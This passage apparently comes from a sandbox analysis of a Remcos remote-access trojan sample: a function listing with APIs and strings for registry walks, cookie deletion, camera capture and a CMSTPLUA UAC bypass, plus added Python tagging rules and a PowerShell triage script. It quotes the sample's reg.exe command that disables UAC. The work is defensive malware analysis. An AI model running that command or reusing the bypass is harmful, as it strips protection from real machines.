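# Editor's heuristic rules (assumed labels): a rule fires when at least one of its APIs
# is called directly (empty set = no API requirement) and every listed substring occurs
# in some String ID entry of the block.
RULES = [
    ("sysinfo-via-dxdiag", {"ShellExecuteW"}, ("dxdiag", "sysinfo.txt")),
    ("inject-into-explorer", set(), ("NtAllocateVirtualMemory", "explorer.exe")),
    ("microphone-capture", {"waveInOpen", "waveInStart", "waveInAddBuffer"}, ()),
    ("staged-download-rename", {"MoveFileW"}, (".part",)),
    ("synthetic-input", {"SendInput"}, ()),
    ("registry-walk", {"RegEnumKeyExW", "RegEnumValueW"}, ()),
    ("browser-cookie-wipe", {"PathFileExistsA"}, ("Cookies",)),
]


def tag_block(block):
    labels = []
    for label, apis_any, strings_all in RULES:
        api_ok = not apis_any or bool(block.apis & apis_any)
        str_ok = all(any(sub in s for s in block.strings) for sub in strings_all)
        if api_ok and str_ok:
            labels.append(label)
    return labels


def triage(text):
    """Map each function's Opcode ID to its capability labels (empty list = nothing flagged)."""
    return {b.opcode_id: tag_block(b) for b in parse_blocks(text)}


if __name__ == "__main__":
    for opcode, labels in triage(SAMPLE_REPORT).items():
        print(f"{opcode}: {', '.join(labels) or '-'}")
```

Run it against a copy of the report's function listing (the real page carries the extra `Memory Dump Source`, `Yara matches` and hash lines, which the parser ignores) to get a per-function capability summary; matches on the Opcode ID rather than the address, so the same tagging carries across samples whose functions share an Opcode ID. Subcall APIs are recorded but deliberately not used for tagging, since a `CreateFileW` reached through a helper says little about the calling function.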
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16_free
                        • String ID: a/p$am/pm$zD
                        • API String ID: 2936374016-2723203690
                        • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                        • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]$xUG$TG
                        • API String ID: 3554306468-1165877943
                        • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                        • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: D[E$D[E
                        • API String ID: 269201875-3695742444
                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                        APIs
                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumInfoOpenQuerysend
                        • String ID: xUG$NG$NG$TG
                        • API String ID: 3114080316-2811732169
                        • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                        • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                        • __alloca_probe_16.LIBCMT ref: 004511B1
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                        • __freea.LIBCMT ref: 0045121D
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID: PkGNG
                        • API String ID: 313313983-263838557
                        • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                        • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                        APIs
                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • _wcslen.LIBCMT ref: 0041B763
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                        • API String ID: 37874593-122982132
                        • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                        • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                        APIs
                          • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                          • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                          • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                        • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                        • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                        APIs
                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                        • _free.LIBCMT ref: 00450F48
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00450F53
                        • _free.LIBCMT ref: 00450F5E
                        • _free.LIBCMT ref: 00450FB2
                        • _free.LIBCMT ref: 00450FBD
                        • _free.LIBCMT ref: 00450FC8
                        • _free.LIBCMT ref: 00450FD3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                        • int.LIBCPMT ref: 00411183
                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: (mG
                        • API String ID: 2536120697-4059303827
                        • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                        • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                        APIs
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                          • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                          • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                          • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-2070987746
                        • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                        • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                        APIs
                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                        APIs
                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe), ref: 004075D0
                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                        • CoUninitialize.OLE32 ref: 00407629
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InitializeObjectUninitialize_wcslen
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                        • API String ID: 3851391207-1448446123
                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
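The record above is the CMSTPLUA elevation path (CoInitializeEx, CoGetObject, the UACMe-derived strings `[+] ucmCMLuaUtilShellExecMethod` / `[+] ShellExec success`, and the elevated target `C:\Users\user\AppData\Roaming\jdSldfVS.exe`); a later record in this listing spawns `cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f` to switch UAC off outright. The following host-triage script is an added example, not part of the Joe Sandbox report or of Remcos: it checks the EnableLUA policy value, looks for the dropped copy under the current user's `%APPDATA%` (the `user` account in the path is the sandbox profile), and flags any process whose parent is a `dllhost.exe` COM surrogate hosting the CMSTPLUA class. The CMSTPLUA CLSID `{3E5FC7F9-9A51-4367-9063-A120244FBEC7}` is an assumption taken from the public UACMe method the strings reference; it does not appear in the report. Variable and function names are the example's own.

```powershell
# Added host-triage script (not from the Joe Sandbox report or from Remcos).
# Run in an elevated PowerShell on a suspected host; it prints a list of findings.

$findings = [System.Collections.Generic.List[string]]::new()

# 1. UAC policy: the sample runs "reg.exe ADD HKLM\...\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f".
$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $uacKey -ErrorAction SilentlyContinue
if ($null -eq $uac -or $uac.EnableLUA -ne 1) {
    $findings.Add("UAC disabled or unreadable: EnableLUA=$($uac.EnableLUA) under $uacKey")
}

# 2. Dropped copy: the report shows C:\Users\user\AppData\Roaming\jdSldfVS.exe;
#    'user' is the sandbox account, so resolve the current profile's %APPDATA% instead.
$dropped = Join-Path $env:APPDATA 'jdSldfVS.exe'
if (Test-Path -LiteralPath $dropped) {
    $hash = (Get-FileHash -LiteralPath $dropped -Algorithm SHA256).Hash
    $findings.Add("Dropped binary present: $dropped (SHA256 $hash)")
}

# 3. CMSTPLUA bypass in flight: the elevated ShellExec is performed by an auto-elevated
#    COM surrogate, so the child's parent is dllhost.exe hosting the CMSTPLUA class.
#    The CLSID is an assumption taken from the public UACMe method; it is not in the report.
$cmstpluaClsid = '3E5FC7F9-9A51-4367-9063-A120244FBEC7'
$procs = Get-CimInstance -ClassName Win32_Process
$byPid = @{}
foreach ($p in $procs) { $byPid[[uint32]$p.ProcessId] = $p }
foreach ($p in $procs) {
    $parent = $byPid[[uint32]$p.ParentProcessId]
    if ($null -ne $parent -and $parent.Name -ieq 'dllhost.exe' -and
        $parent.CommandLine -and $parent.CommandLine -imatch $cmstpluaClsid) {
        $findings.Add("PID $($p.ProcessId) ($($p.Name)) was started by CMSTPLUA surrogate PID $($parent.ProcessId): $($p.CommandLine)")
    }
}

if ($findings.Count -eq 0) { 'No EnableLUA/CMSTPLUA artefacts found.' } else { $findings }
```

The parent-process check is a point-in-time heuristic: the surrogate usually exits shortly after the elevated child starts, and Windows reuses PIDs, so a clean result here does not clear the host. Pair it with process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing) filtered on a `dllhost.exe /Processid:{3E5FC7F9-...}` parent, and treat an `EnableLUA` value of 0 as a finding regardless of who set it.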
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                        • GetLastError.KERNEL32 ref: 0040BAE7
                        Strings
                        • [Chrome Cookies not found], xrefs: 0040BB01
                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                        • UserProfile, xrefs: 0040BAAD
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                        • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                        APIs
                        • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AllocOutputShowWindow
                        • String ID: Remcos v$5.0.0 Pro$CONOUT$
                        • API String ID: 2425139147-2278869229
                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                        • API String ID: 4061214504-213444651
                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                        APIs
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered$`#v
                        • API String ID: 614609389-3049340936
                        • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                        • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                        APIs
                        • __allrem.LIBCMT ref: 0043AC69
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                        • __allrem.LIBCMT ref: 0043AC9C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                        • __allrem.LIBCMT ref: 0043ACD1
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                        APIs
                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                        • API String ID: 3469354165-3054508432
                        • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                        • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
